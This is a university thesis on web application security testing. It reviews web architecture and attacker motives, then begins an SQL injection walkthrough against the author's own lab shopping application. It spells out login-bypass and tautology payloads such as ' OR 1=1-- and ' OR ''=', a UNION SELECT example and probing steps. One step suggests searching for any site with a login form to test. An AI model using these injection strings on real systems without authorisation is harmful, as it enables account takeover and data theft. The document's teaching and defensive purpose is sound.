Security Testing on Web Application Prepared by: Tausif Aghariya

Transcription

PRT505
Thesis
Security Testing on Web Application
Prepared by:
Tausif Aghariya
S244431
Supervisors: Krishnan Kannoorpatti, Sami Azam
School of Engineering and IT
Faculty of EHSE
Charles Darwin University
Darwin
May, 2015
2
PRT505
Thesis
Acknowledgement
The writing of this thesis has been one of the most important parts in my Software
Engineering course. I express sincere thanks to my supervisors Krishnan Kannoorpatti and
Sami Azam for their constant support and guidance. I like to say special thanks to my unit
coordinator Mirjam Jonkman, my course coordinator Charles Yeo, Technical officer Balaji
Iyyaswamy, Ashikali Hasan and Librarian Bandana Koirala for their all support and giving
their precious time to finish this thesis.
3
PRT505
Thesis
Abstract
Approach towards most web-applications were unplanned, thus across a need to raise security
standards as it requires much efforts to maintain in meeting its quality standards. With
existing and new technologies like ASP, VB scripts, CGI, it's quite hard enough task to assess
the quality of web because of the factors that influence the performance of the website.
With data all over the place and with users having no minimal knowledge on how to protect
their data, the dark side of technology always tried to devise its own path and is now
affectation a serious threat to web security with new set of computer security vulnerabilities,
SQL injection and cross-site scripting (XSS). Though there were some exploits such as buffer
overflow, these SQL-Injections and cross-site scripting vulnerabilities are instances of the
broader class of input validation, which are a result of changing security requirements. These
input validation-based vulnerabilities therefore require fundamentally new techniques to
characterize and mitigate them. This dissert focuses on how efficiently can we deal with these
web security vulnerabilities, thus addressing active issues primarily with SQL injection
attacks. Further we will divide the field of web applications to understand vulnerable domains
and will focus on the approach which could be followed to address the exploits which could
occur due to vulnerabilities and the approach or methodologies which we can use to give
proper security to the web application.
Keywords: Web application security, web application vulnerabilities, Security testing
methodologies
4
PRT505
Thesis
Table of Contents
Acknowledgement ....................................................................................................................3
Abstract ....................................................................................................................................4
List of Figures ..........................................................................................................................8
List of Abbreviations ..............................................................................................................10
I.
Introduction ...................................................................................................................11
1.1
II.
Motivation ..............................................................................................................12
Literature review............................................................................................................14
2.1
Web Application Histories .....................................................................................14
2.2
Web application and its components ......................................................................14
2.2.1
Database layer: ................................................................................................... 15
2.2.2
Operational layer:............................................................................................... 15
2.2.3
User Interface layer: ........................................................................................... 15
2.3
Security needs for Web Application: .....................................................................17
2.3.1
Financial motivated attacks: .............................................................................. 18
2.3.2
Ideology Driven Attacks: ................................................................................... 19
2.3.3
Attack-Discovery and Timeline: ........................................................................ 19
2.4
Most prevailed vulnerabilities of Web application security...................................19
III. Methodology and expremental scenario ........................................................................20
V.
3.1
SQL Injection Attack .............................................................................................20
3.2
SQLI Bypass Authentication Attack ......................................................................22
3.3
Types of SQL Injection: .........................................................................................27
3.3.1
Simple SQL injection Attacks (Ping-Chen, 2011):............................................ 28
3.3.2
SQL Injection in MySQL By using URL method ............................................. 28
3.3.3
Sql Injection InMySqlBy Blind Injection Method: ........................................... 39
Literature review on web security practices ..................................................................47
5.1
History of web application security fields and practice .........................................47
5.2
Web security design with software engineering ....................................................48
5.2.1
Security Requirements ....................................................................................... 49
5
PRT505
Thesis
5.2.2
Secure Application Design and threat modelling .............................................. 50
5.2.3
Develop with Secure Coding- ............................................................................ 50
5.2.4
Application Security Testing- ............................................................................ 50
5.3
Standards of the Australian web security ...............................................................51
5.3.1
Content Security Policy ..................................................................................... 51
5.3.2
HTTP Strict Transport Security ......................................................................... 51
5.3.3
Cookie Security Enhancements ......................................................................... 52
5.3.4
Input validation requirements standers .............................................................. 53
5.4
Current situation for security testing of web application .......................................54
5.4.1
Google introduced two layer authentications: ................................................... 56
5.4.2
Introduce SSL (Secure socket layer): ................................................................ 57
VI. Methodologies for securing web applications ...............................................................57
6.1
Agile security testing ..............................................................................................57
6.2
Penetration testing ..................................................................................................59
6.3
Open Web Application Security Project (OWASP) ..............................................61
VII. Approach for preventing SQL injection attack..............................................................65
7.1
Preventing SQL Injection: ......................................................................................65
7.2
Prevention of SQL injection attacks by using Filters and techniques ....................67
7.2.1
SQL dom: ........................................................................................................... 68
7.2.2
Amnesia: ............................................................................................................ 68
7.2.3
Input validation .................................................................................................. 68
7.2.4
Session management: ......................................................................................... 68
7.3
Prevention of injection in MySQL by using URL method attack .........................69
7.4
Analysis of web application code...........................................................................69
7.4.1
By Static code Analysis with polyspace code verifiers ..................................... 69
7.4.2
Measuring code complexity and checking with coding standards..................... 70
7.4.3
Proving the presence of errors ........................................................................... 70
7.4.4
Performing impact analysis................................................................................ 71
7.5
URL method for prevention of SQL injection .......................................................71
6
PRT505
Thesis
7.6
SQL injection by using Bypass authentication method .........................................73
7.7
Secure the Blind SQL Injection: ............................................................................78
VIII. Conclusion .....................................................................................................................80
IX. Reference: ......................................................................................................................81
X.
Appendices ....................................................................................................................87
10.1
Appendix- A ...........................................................................................................87
10.2
Appendix- B ...........................................................................................................90
10.3
Appendix- C ...........................................................................................................92
10.4
Appendix- D ...........................................................................................................93
7
PRT505
Thesis
List of Figures
Figure 1 Reasons for problem statement ................................................................................. 12
Figure 2 Web Application History (Owasp.org.au, 2015) ...................................................... 14
Figure 3 Architecture of web application (Antunes, Laranjeiro, Vieira,& Madeira, 2009) .... 16
Figure 4 External Attacker Motives over Web-App Attacks (Mcclure & Kruger, 2005) ....... 18
Figure 5 Types of SQL Injection Attack (Ping-Chen, 2011) .................................................. 27
Figure 6 Simple SQL Injection Attacks (Ping-Chen,2011) ..................................................... 28
Figure 7 Buy Cut Save Application Null Column Analysis .................................................... 32
Figure 8 Buy Cut Save Application Fatching Database Version ............................................ 33
Figure 9 Buy Cut Save Application Fatching Database Name ............................................... 35
Figure 10 Buy Cut Save Application Fatching User Information .......................................... 36
Figure 11 Buy Cut Save Application Database, Table and Column Emuniration.................. 37
Figure 12 Buy Cut Save Application Enumerating Column .................................................. 38
Figure 13 Buy Cut Save Application Dumping Database ....................................................... 39
Figure 14 Buy Cut Save Application Blind SQL Injection Checking ..................................... 40
Figure 15 Buy Cut Save Application Blind SQL Injection Checking .................................... 41
Figure 16 Buy Cut Save Application Getting Version in Mysql Database ............................. 42
Figure 17 Buy Cut Save Application Getting Version in Mysql Database ............................ 42
Figure 18 Buy Cut Save Application Enumerating Name from Database ............................. 43
Figure 19 Buy Cut Save Application Enumerating Name from Database ............................. 44
Figure 20 Buy Cut Save Application Enumerating Name from Database .............................. 44
Figure 21 Buy Cut Save Application Enumerating Column Name ........................................ 45
Figure 22 Buy Cut Save Application Enumerating Column Name ......................................... 46
Figure 23 History of Web application Development till Hacking Arrives (Owasp.org.au,
2015) ........................................................................................................................................ 47
Figure 24 Security in SDLC Process (SANS Institute, 2007) ................................................ 49
Figure 25 HTTP Strict Transport Security.............................................................................. 52
Figure 26 Australian Standard Input Validation Requirments ............................................... 53
Figure 27 Steps for Security Testing ...................................................................................... 55
Figure 28 Top 10 Reported Vulnerabilities in Web Application ............................................. 56
Figure 29 Agile Software Testing Process.............................................................................. 59
Figure 30 Penetration Testing .................................................................................................. 61
Figure 31 OWASP Testing Work Flow (Owasp.org.au, 2015) ............................................... 62
Figure 32 Prevention for SQL Injection (Dupaul, 2015) ........................................................ 66
8
PRT505
Thesis
Figure 33 Defensive Coding .................................................................................................... 67
Figure 34 Single Filter for Different Pages.............................................................................. 72
Figure 35 Web Application Filter Architecture ...................................................................... 72
Figure 36 Buy Cut Save Application Login Page ................................................................... 73
Figure 37 Buy Cut Save Application Login Page ................................................................... 75
Figure 38 Buy Cut Save Application Category Form page .................................................... 76
Figure 39 Buy Cut Save Application Category Form Page ..................................................... 77
Figure 40 Buy Cut Save Application Category Form Page .................................................... 79
9
PRT505
Thesis
List of Abbreviations
Abbreviation
API
Application Programming Interface
BCS
Buy Cut Save
CGI
Common Gateway Interface
CSS
Cascading Style Sheet
DB
Database
ERP
Enterprise Resource Planning
HSTC
History of Science and Technology
HTML
Hyper Text Mark-up Language
HTTP
Hyper Text Transfer Protocol
HTTPS
Hyper Text Transfer Protocol with Secure
socket layer
MD5
Message Digest 5
MySQL
My software query Language
OWASP
Open Web application security project
SDLC
Security Development Life Cycle
SQLI
Structure Query Language Injection
SSL
Secure Socket Layer
UI Layer
User Interface Layer
UML
Unified Modelling Language
URL
Uniform Resource Locator
XML
Extensible Mark-up Language
XSS
Cross Site Scripting
10
PRT505
Thesis
I. Introduction
Gone are those days where web is all about static pages ( Html introduced to be static, as
there were no form & input tags hence forth HTTP didn’t come up with a post method) with a
very limited to nothing for user’s as the interaction. It all started in the year 1993 where The
mosaic browser released extended features like lists, nested lists, added pictures, fill-out
forms, etc., but received lot of uncertainties as it was not designed properly(Atefeh,Suhami,
& Antunes, 2012). In the same year Common Gateway Interface (CGI) was designed which
“dynamically generate HTML server-side scripts” on the given input. Then within no time
the Netscape 2.0 came up with Java Scripting and made the world know the wonders of it and
it still helping us in taking the technology to the next level (Ben, 2003). Microsoft in 1997
changed the face of World Wide Web by presenting Iframes as an internet explorer which
leads to new revolutions in enhancing the browser technology by loading the data
asynchronously and immediately Microsoft has pushed “XMLHTTP” interface on the release
of IE5(Curphey& Arawo,2006). Slowly this technology picked up by other browsers which
followed with “XMLHttpRequest”. The new millennium 2000, Web application took a new
phase with Web application frameworks (Web 2.0, which allowed user to do more than just
information retrieving) got introduced and the new era begun, we call it the fundamental step
because Web 2.0 has created a platform for creating web –aware applications with high
interactivity and user centric(Ben-Natan, 2005). Without Web 2.0 Internet would have been
extremely different to present day, there would be no E-commerce (such as EBay, Flip kart,
Amazon), web mails, internet messaging, Internet banking, international share trading,
forums, web communities (Twitter). With the advent of Web 2.0 greater than before
information sharing through networking communities and growing market in adoption of the
web into business and delivery as a service, websites are often attacked directly as they stand
as the face of business(Gavin, Eric & Schulte, 2005).
11
PRT505
Thesis
1.1 Motivation
 Problem Statement:
Vulnerabilities are still major security issues in web application and cause many exploits
 Reason for Problem:
Figure 1 Reasons for problem statement
However, as it’s defined in Figure 1, there are so many reasons for vulnerabilities are still
present in web application. Now day’s developers try to add more and more functionality in
the web application. That means developers need to write more code for the app and that
creates infinite coding errors and more opportunity for vulnerable codes. The security testing
methodologies and process of web application came on early 2001. So, developers are not
getting sufficient security testing training. Moreover they are giving less priority on risk
analysis. These are the reasons which I considered based on my research why vulnerabilities
are still present in the web application.
12
PRT505
Thesis
 Proposed Solution:
The preferable solution for this problem is maintain the security standard of the web
application by using suitable security testing methodologies and try to give proper security
for vulnerabilities in web application.
 Overview of the Report:
This report mainly divided in to four phases. First phase includes the introduction of the web
application, method of web application and its architecture, why security is necessary for web
application and most prevailed vulnerabilities of the web application.
Second phase explained about SQL Injection attack which is world second highest attack
technique on the web application. It includes how the SQL Injection works, types of SQL
Injection and practical implemented in one BCS (Buy Cut Save) web application, hack the
whole database of the web application by using SQL Injection technique.
Now from the third phase onwards, its starts to explain about the security testing practice,
current situation for security testing approach, how different methodologies are available to
use security testing process in development of web application, how’s Australian security
standards are set for web application and by using the security testing process how we can
save the BCS web application which we hack by using SQL injection.
 Tested Web Application:
The installation of vulnerable web application guided by my supervisors, however I
established lab in CDU with the permission of IT department. I established my own server
and domain in to the lab. And I install BSC PREDICTION web application for my SQL
injection methods for testing. I used that lab for my all testing and thesis related work.
The example vulnerable code is help full to illustrates the SQL injection vulnerability. The
analysis is clearly visualized that the variable id is not filtered hence any of the input can pass
through it to the application.
13
PRT505
Thesis
II. Literature review
2.1 Web Application Histories
The given Figure 2 explain about the how web application technologies arrive within the time
frame. The present day web is completely embraced with millions of small, medium & Large
scale businesses as an economical medium to communicate and exchange information with
prospects and transactions with clients, partners and anyone in that matter. If we take a look
at the current situation Large web apps are being developed and this have become
unmanageable with messes of jQuery and the application backend code, leading flaws into
the application(Fahad & Sarrab, 2011).
Figure 2 Web Application Histories (Owasp.org.au, 2015)
2.2 Web application and its components
It can be defined as highly programmed environment which can take and allow mass
customization through the immediate deployment of a larger and diverse range of application,
to billions across the globe. From past 10 years (or more), web has been playing a vital role in
many of the business transactions (Cross, & Books24x7, 2007). Undoubtedly, it has been
whole heartedly accepted by millions of people/businesses and it has become an inexpensive
channel to communicate and exchange information.
In fact, Web provides a channel through which marketers can sell their products by
advertising, analysing the number of people visiting their sites and communicating with them.
People now a days are getting their work done sitting right in front of their computer/Mobile
and no wonder that the reason behind this is the 'Web application(s)'(Doupé,
14
PRT505
Thesis
Cova&Vigna,2010). All the data regarding the transactions or may be any other should be
fetched, processed and stored somehow for further use and this data can be retrieved through
the web applications in the enquiry or the login forms. Common Examples of web
applications include web mails, online banking/Shopping sites, google docs, gaming sites etc.
(Antunes, Laranjeiro, Vieira, &Madeira, 2009).
A web application generally comprises of the following 3 layers:
The DATABASE layer (Model): This is where the entire information gets stored.
The OPERATIONAL layer (Controller): This is where the logic behind the application is
written.
The UI layer (View): This is the interface through which user(s) interacts.
2.2.1 Database layer:
It is used to store the entire information. This layer is an internal interface and not exposed to
the user. The DB access related calls are not made directly to the storage engine; instead, all
the DB access is routed through the DB layer. All the data will be structured into objects and
these objects in turn are stored in the form of tables and the attributes of an object are stored
as columns in the Database.
The Database layer is responsible for fetching, creating, updating and deleting (CRUD
operations) Individual Records, attributes and values within records. All the DB vendors
provide their own interface tailored to their products, which leaves it to the application
programmer to implement code for all the Database interfaces he or she would like to
support. Some of the database vendors include oracle, SQL server, My SQL, DB2,
PostgreSQL.
2.2.2 Operational layer:
This is the layer where the application related business logic is defined. It is solely
responsible for handling user requests and rendering responses within stipulated time with the
aid of DB & UI layers. Operational layer can be treated as a manager who ensures that all the
resources needed for completing a task are delegated to proper layers. It also waits for the
requests from clients, authenticates it, delegates’ data fetching or processing to the model,
selects the data that is to be presented to the client and finally delegates rendering process to
the UI layer. Some implementations of this layer include PHP, Perl, and ASP.
2.2.3 User Interface layer:
This is the interface where the User interaction happens. Whenever a user raises a request
based on controller actions the data is retrieved from the underlying DB and rendered to the
15
PRT505
Thesis
HTML page or the UI for the user to consume. This layer is not limited to HTML or any text
representation of data but also can deliver wide variety of formats such as Pictures,
documents, Videos and any other format the user asks for. This layer makes use of the
technologies like HTML, CSS, Java script (its frame works) and many more.
Figure 3 Architecture of web application (Antunes, Laranjeiro, Vieira, & Madeira,
2009)
As it mention in the Figure 3, Web applications can be defined as the computer programs
which allow users to retrieve or submit data from (to) a database using a preferred web
browser. Though there are many advantages of Web applications, one significant advantage
is that they perform indecently. Web apps can be quickly deployed anywhere at no cost and
no installation is required at user's end.
It's also quite important to understand that web application generally work over the http
protocol, where http functions as a "request-response" protocol in the client-server protocol.
A connection is established in the form of sessions, so called http sessions refer to a
customized HTTP Cookie to associate a certain amount of information with the client. This
cookie termed as Session Hash and is encrypted with a common practice to store users/clients
access information.
16
PRT505
Thesis
2.3 Security needs for Web Application:
There is no doubt about it, with diverse techniques available to attackers made defending web
applications a herculean task. SANS Institute rates " That Internet-facing Web sites that are
vulnerable to attack as the second highest cyber security risk to enterprises"(Bayles
Books24x7,2007).Web applications are now meant for cost-effective business solutions and
are proved doing easy business. For the same reason they are widely used across all sectors
which includes business, banking, finance, education, healthcare and technology among
others(Bayles, A.W. & Books24x7,2007). Threats over the internet are so poised that nothing
over the web is considered to be safe. Online services in integration with web applications
had grown at a very brisk pace with a very minimal to no attention on the security which
leads many numbers of corporate sites vulnerable to attacks.
Websites and Web applications facing towards the internet are low hanging fruits for the
attackers as these applications handle so much of data which includes personal identifiable
information or private data of the Organization and its clients, many prominent organizations
have fallen prey for hackers because they invest too much on the network security and little
over web application security which is all most like "We buy good doors when the problem is
with windows"(Fong, Gaucher&Okun,2008). A security breach can put everything at stake. It
damage trust of a customer, Reputation, Revenues and can also lead to legal liabilities.
Website functionality is purely dependent on its web applications. These applications are
programmed to capture, process, transmit & storage of personal and confidential information
such as banking details, SSN, medical history. The other side of attacks is not to steal the data
present in the database servers of the applications but to change the trusted websites into
malicious websites for client side exploits (Razzaq, Hur, Farooq & Masood, 2012).
White Hat Sentinel, an Organization that assesses largest e-commerce, healthcare and
technology service firms. Their security statistics report confirmed that 83% of the websites
are prone to at least one severe vulnerability (Fonseca, Vieira&Madeira, 2007).
Web Applications will remain as punch bags of the internet. They are compromised in any of
the two ways either by exploiting weakness in the application or by using impersonating with
stolen credentials (McClure&Krüger, 2005). Verizon's DBIR suggests that 3,937 incidents
are been recorded out of which 490 are confirmed data disclosure. Every two out of three
attacks are somehow driven by the ideology and rules of the activists groups, less than one of
envy three implied to financial motivated attackers with intension of espionage.
17
PRT505
Thesis
Idealogy/Fun
Financial
Espionage
0%
10%
20%
30%
40%
50%
60%
70%
Figure 4 External Attacker Motives over Web-App Attacks (Mcclure & Kruger, 2005)
2.3.1
Financial motivated attacks:
Figure 4 explain about the every informational asset will and would have some value and it’s
called as hack value for the attackers, Financial driven attacks are meant for gaining access to
money, and for the same reason financial and retail organisations stand in as their prime
scope because the data is meant to be money(Shelly,2010).If it is a financial
industry/Organization the attacks will be majorly towards gaining access to the web
application as this drives us in gaining logical access to the money. This means the user
credentials and a single factor authentication achieves the desired result to the attacker. In
order to steal the credentials there might be many known and reported tactics but the usual
tactics which we come across are as follows (McClure& Krüger, 2005):
-
Phishing techniques – tricks the user to supply the credentials, or by installing some
malwares to steal the credentials.
-
One among the oldest methods was password guessing attempts using Brute force
techniques
-
And with the rarest among all and requires skill to perform, is directly targeting the
application using SQL Injections in that matter application level attacks or attacking the
user management system itself for seeking user-credentials to bypass the authentication.
Retails industry suffers with majority of attacks aimed for Payment card information with
95% of the total reported incidents were on stealing the Payment card information (Morgan,
18
PRT505
Thesis
2006). This information is often easily accessible by simply exploiting any web application or
stealing the saved credentials. Social engineering has also played and still playing its
effective role as this family of attacks works pretty well enough. SQL injection dominance in
web applications still continues with retail industry leveraging to 80% which is followed by
techniques to install shells for local file inclusions (LFI), remote file inclusions (RFI) with 7
%( Meier& Meier, 2006).
2.3.2 Ideology Driven Attacks:
These attacks represent the identified motives in attacking web applications with attackers
based out of different geographical locations. Majority of the attacks are focused on true
exploiting of the targets (Simpson, Backman& Corley,2012).
The attacks are driven by different reasons but the Ideological attackers are very less
concerned about getting the business data. It’s anticipated to see attacks majorly over
defacement and to send a message or hijacking the server to attack others, which can even
lead to cyber extortions. The webservers were the only assets targeted in most of the Ideology
motivated attacks (Sarasan ,2013).
2.3.3 Attack-Discovery and Timeline:
Within financially motivated attacks the discovery can be recorded and the attack notification
reported by the Customer itself, perhaps customer is the one to notice such fraudulent activity
prior to anyone else. Below are the graphs for showing “Discovery Timeline with respect to
Attacks” (Manuel Costa, Miguel Castro, Zhou, Zhang&Peinado, 2007).
2.4 Most prevailed vulnerabilities of Web application security
"What we need is more secure web application not just more security enabled application.
The most important task in any industry is to identify the vulnerabilities before an attacker
does and provide appropriate measures to safe guard the application and reputation of the
organization from any attacks (Insight Security Research (NISR) publication, 2002). Not only
discovering the vulnerabilities but also estimating the associated risks to business is also
equally important. There might be any security assessment methodologies used by the
Organizations in the development life-cycle of the application we might even find security
concerns in design or architecture or might even be with the framework (Insight security
research (NISR) publication, 2002). At the later stage where they may find security related
issues with secure code review or by application security testing (Penetration testing). Or
security weakness may not be identified even after its release and compromised. According to
White Hat sentinel in correlation to a survey conducted for 76 Organization across different
19
PRT505
Thesis
industries, the result suggests that the software security controls and the software
development lifecycle behaviours with respect to the vulnerability outcomes and with
breaches reported are quite complicated to draw any conclusion (Tajpour, Ibrahim& Sharifi,
2012).
Reports like Verizon data breach report, OWASP Top 10, White Hat Sentinel, Symantec
Threat report or essentially any other report in that context focus on identifying most severe
risks for the Organization in different business areas. Any risk will be evaluated based on
Security controls, threat agents and business impact of the organization. Business impacts are
considered to be application/business specific and threat agents are application specific and
these are dependent on the details of the application in respect to the enterprise (Oehlert,
2005). According to the web application security reports 2014 almost all the reports
concluded in listing the same on the risks associated with attacks over web applications, the
top 10 attack types have been and listed based on the attack type and its impact on the
business(Howard, LeBlanc&Viega,2010). Howard, Leblanc and Viega descoverd top 10 web
application attacks which are in appendix A.
III. Methodology and expremental scenario
3.1 SQL Injection Attack
Web applications had become more sophisticated and increasingly complex with its
architecture. Their existence has given a new dimension to e-commerce, Entire price
resources planning industry and its cleanly visible today as we are standing as end-users of
these applications. With the availability of these enterprise systems and the sensitive data
they store, handle and process had become critical to all major industry sectors not only for
ecommerce industry (Bayles, A.W. & Books24x7, 2007).
SQL injections attacks are from the family of injection attacks. The term SQL is generally
pronounced as sequel and stands for structured query language, and used in specifically
querying the database (Antunes, Vieira, 2009). These are considered to be the most common
application layer attack that is multifaceted and dominant. These attacks are only possible if
the target applications have back-end database with improper coding and no proper control
over input validation. On successful exploitation of these weakness will allow the attacker in
Reading, Modifying(Insert-Update-Delete) sensitive data and has the capacity to provide
administration access to the database where operations like shutting down the database,
owning the data base is possible(Cross, & Books24x7,2007). Due to ubiquity of SQL across
different platforms and databases this attack had found to be portable. In order to carry out
20
PRT505
Thesis
these families of attacks one should have immense knowledge on Client server Technologies,
Web applications, databases and also patience (Portland, 2013).
Appendix D intoduced by Razzaq, Hur, Farooq& Masood in 2012 which is explaining about
the attacking factors and impacts of the SQL Injection attack.
Attacks which use SQL injection target those websites or web-applications which allow
submitting data and retrieving the data from the databases over the internet. Databases are
playing a vital role in the functioning of modern day websites or web-applications as they
store the data required for the web sites or applications to render its services by providing
appropriate content to its authorized customers, stakeholders and employees (Cross, &
Books24x7, 2007). Data associated to end-user credentials, banking information, companies’
proprietary information may reside in the database and can be accessed by authorised users
via customized or off-the-shelf applications.
SQL injection attacks are performed by crafted SQL codes which are appended or inserted
into the web application as user input parameters which tricks the interpreter and executes
itself in the form of queries to the database. Any system that constructs the SQL Queries
might be vulnerable, SQL as a language for specifically constructing queries to the databases
will provide a diversified coding options (Dharam, Shiva, 2014).
Based on the application functioning and processing of user-supplied-data, SQL injection
attacks can be used to perform the following types of attacks (Doupé, Cova&Vigna, 2010):
 Authentication Bypassing: using this attack, an attacker logs onto an application without
providing valid username and password, gains administrator privileges.
 Information Disclosure: Using the attacks, an attacker can obtain sensitive information
that is stored in the database.
 Compromised Data Integrity: An attacker uses this attack to deface a website /
webpage, insert malicious content into web pages, or alter the contents of a database.
 Compromised Availability of data: Attackers use this attack to delete the database
information, delete log, or audit information that is contained in a database.
 Remote Code Execution: It allows an attacker to compromise the host operating system.
Example of a small basic SQL vulnerability:
Let's consider an example of a web application which is hosted by a bookstore to make their
service available to the customers online.
21
PRT505
Thesis
3.2 SQLI Bypass Authentication Attack
As customers search for all books in the store published by some publisher XYZ, the
application will perform the below query (Shar&Tan, 2013):
 Select Author, Book_name, published_year from bookstore where publisher =
'XYZ'
Let's consider if a customer searches for books that are published by T'XYZ. Then
application performs the below query.
 Select Author, Book_name, published_year from bookstore where publisher =
T'XYZ
Incorrect Syntax
Server Error msg
Unclosed Quotation mark before the character string
Note: When application is subjected to behave this ways, then we can say this application is
open for SQLi attacks.
This flaw allows an attacker to manipulate the query in way where it can retrieve information
of every book present in the bookstore, by using the below string:
XYZ' or 1=1-Let’s insert the above crafted string into the Query for an unprecedented output:
 SELECT Author, Book_name, Published_year from bookstore where publisher =
'XYZ' or 1=1--'
As it is a known fact that 1always equals to 1, permits the database to retrieve every book
present in the table - bookstore.
Note: "--" (double hyphen) in SQL means to tell the interpreter to ignore the rest of the line
after it as it is a comment. But with MySQL there should be a space or "#" after "--" to
specify as a comment.
In certain instances, a very small and simple SQL injection flaw might have an immediate
critical level impact. Most of the applications are running with form-based-login function, it
uses a database to store the user's authentication information (Credentials) and performs a
SQL query to verify each login attempt made by the user. Below a small example of a query
on the same:
SELECT * from users where username = 'JOHN' and passwd = 'NHOJ'
An attacker can inject his crafted request either in the username text-field or in the password
text-field to alter the query for his own requirement. Let's assume for instance if the attacker
have knowledge about the administrator username of the application as "administrator". Now
22
PRT505
Thesis
that he knows the user name he can log in as admin just by supplying any password and
username as following:
Admin'-By inserting “admin" in the query the query seems to be as following:
Select * from users where username = 'admin'--' AND passwd = 'abcdef'
With the comment symbol before the password, the execution of validating the password has
been bypassed.
Now if the attacker is unaware of the administrator's username. The following might help an
attacker to gain the access.
- Normally in most of the application, the first account in the database will be of
Admin user, as this account will be used to create other accounts in the application.
- Further, if the submitted query retrieves an output with more than one user, many
applications will simply process the details of the first user.
An attacker can frequently exploit to log in to the application as the first user of the database
by passing the following string in the query as username:
‘OR 1=1-This allows the application to perform the following query
SELECT * from users where username = " OR 1=1--' AND password = 'abcde'
- In most of the cases, SQL injection vulnerability may be identified and verified just
by passing a single un-trusted input into the application.
Below are the snap shots of the testing which I did in my lab on BCS web application which
developed by me. Also I used that web application for testing.
 user fills out the login form like this:
Login: ' OR ''='
Password: ' OR ''='
 This will give SQLQuery the following value:
SELECT Username FROM Users WHERE Username = '' OR ''='' AND
Password = '' OR ''='‘

Instead of comparing the user-supplied data with that present in the Users table, the
Query compares '' (nothing) to '' (nothing), which, of course, will always return true.
23
PRT505
Thesis
 We can see in snap shot it fill user name as ' OR ''=' and password as ‘OR”=’. Instead
of comparing the user-supplied data with that present in the Users table, the query
compares '' (nothing) to '' (nothing), which, of course, will always return true. You can
see in below snap shot user can enter in the main page with the use of bypass
authorization methods of SQl injection.
24
PRT505
Thesis
There even may be instances where flaws can be very subtle and can make things hard in
distinguishing other categories of vulnerabilities or from small security weakness that do not
pose any threat(Cross, & Books24x7,2007).
Note: With applications accessing the back-end database, it quite important to verify URL
parameters, POST functions implemented by application, HTTP Headers, Cookies.
Attack characters
Description
' or "
character string indicators
-- or #
Single line comment
/*...*/
Multiple line comment
?parmeter1=xyz&Parameter2=123
URL Parameters
PRINT
Will be useful as non-transactional command
@variable
Local variable
@@variable
Global variable
@@version
To display SQL server version
In order to successfully exploit any SQL injection vulnerability it is necessary to break the
quotes. As the end user passed input data gets incorporated in the form of SQL command and
the input will be placed in single quotes (Cross, & Books24x7, 2007).
25
PRT505
Thesis
Detect SQL Injection Issues: Try passing a single quote as an unexpected character input and
observe if any error or the result is in any other way to know where exactly the user given
input is not sanitized.
If there is an error or a strange behaviour observed, pass second single quote meaning two
single quotes together. It is a known fact that databases use couple of single quotes as an
escape sequence. But here it got interpreted as the string in between the single quotes and not
as the closing string terminator. And now if the result is error free or the strange behaviour
gets disappeared, then yes the application is most likely vulnerable to injection attacks
(Anley, 2007).
To conclude the existence of the injection flaws, the SQL concatenating characters to craft a
string. If the application responds the crafted input with the expected output, then the
application is said to be vulnerable. Every database uses its own method in string
concatenation.
Detect Input Sanitization:
Usage of "right-square-bracket "(the] character) as an input character in verifying the
instances on where exactly the given input is getting used as SQL identifier without any
sanitization.
 Detecting Truncation Issues:
Pass lengthy strings of unexpected data into the application in a way we submit the input to
check for any instance of buffer overflows. These actions may throw SQL errors on the page
if they are vulnerable.
Database type
String Concatenation characters
Oracle
'||'
MS-SQL
'+'
MySQL
' '(Space between two single quotation
marks)
Note:
- To confirm whether the application is accessing the database is by using “%"( A wildcard
character) in the input.
- Submitting wildcard character - % in the search field will often produce many results,
which indicated that a SQL query got executed in the associated database.
- Testing for SQL injection weaknesses are given in appendix B.
26
PRT505
Thesis
3.3 Types of SQL Injection:
SQL Injection
Simple SQL
injection
Union SQL
Injection
Blind SQL
Injection
Error Based
SQL Injection
Figure 5 Types of SQL Injection Attack (Ping-Chen, 2011)
The types of SQL injection are categories in the Figure 5. Which has simple SQL injection
method, Blind SQL injection method and the sub types of simple SQL injection are union
SQL injection and Error based SQL injection. All the types are going to explain in more
details in report.
27
PRT505
Thesis
3.3.1 Simple SQL injection Attacks (Ping-Chen, 2011):
Union Query
•"UNION SELECT" statement returns the union of the intended dataset with the target
dataset.
•Eg: select Name, Phone, Address from Users where id=1 UNION ALL SELECT creditcard
•Attackers exploit database's stored procedures to perpetrate their attacks
System Stored
Procedure
End if line
Comment
•After injecting the crafted code into a specific field, legitimate code that follows is nullified
through usage of end of line comments
•Eg: select * from user where name = 'xyz' and userid IS NULL; --';
Tautology
•Injecting statements that are always true so that queries always return upon evaluation of
a WHERE condition
•Eg: SELECT * FROM users WHERE name = ' ' OR '1'='1';
Illegal/Logically
Incorrect Query
•An attacker may gain knowledge by injecting illegal/logically incorrect requests such as
injectable parameters, data types, names of tables etc.
Figure 6 Simple SQL Injection Attacks (Ping-Chen, 2011)
Above Figure 6 explain about the functions and the statement which use to perform SQL
injection attack. Attacker can use Union Query, system store procedure, end line comment,
tautology and illegal/ logical incorrect query.
3.3.2 SQL Injection in MySQL By using URL method
Generally attacker may perform his attack for testing vulnerability by passing quote as an
input if application return with an error massage then it may be consider that web application
is vulnerable to SQL Injection (Sutton, Greene& Amini,2007). Error massage varies and
depends on the type of database so it may possible that you may get different error in
different web application. Finding a SQL Injection Vulnerability before launching a SQL
injection attack, the hacker determines whether the configuration of the database and related
tables and variables is vulnerable. The steps to determine the SQL Server’s vulnerability are
as follows (Naresh, Soujanya, Yugandhar&Rao ,2011):
28
PRT505
Thesis
1. Using your web browser, search for a website that uses a login page or other database input
or query fields (such as an “I forgot my password” form). Look for web pages that display the
POST or GET HTML commands by checking the site’s source code.
2. Test the SQL Server using single quotes (‘’). Doing so indicates whether the user input
variable is sanitized or interpreted literally by the server. If the server responds with an error
message that says use 'a'='a' (or something similar), then it’s most likely susceptible to a SQL
injection attack (Cross, 2007).
3. Use the SELECT command to retrieve data from the database or the INSERT command to
add information to the database.
For this thesis, I used BCS application which I developed during my academic project. The
name of the application is BSC (Buy Cut Save) PREDICTION. It is an application which
provides information to the customers for giving meat order. So, based on that order butcher
can see the all orders of the customers and he can put more meat items in the web application.
So by using MySQL injection by using UML method, I exploited the all personal customers’
information such as email, contact, company name, etc. and the all database and get the
butcher information as well. So, the all following tests done on local host server with this
application.
3.3.2.1 Adding Malicious Characters
In a link of a website you may find that there is an "=" sign. In order to perform an SQL
injection on website, you will need to type commands after the "=" sign. Simply start typing
the commands after the equals sign and click "Go" in your web browser, as if you are going
to a new website. The simplest way to understand what you need to do is to see an example
attack broken down into steps (Palmer, 2007).
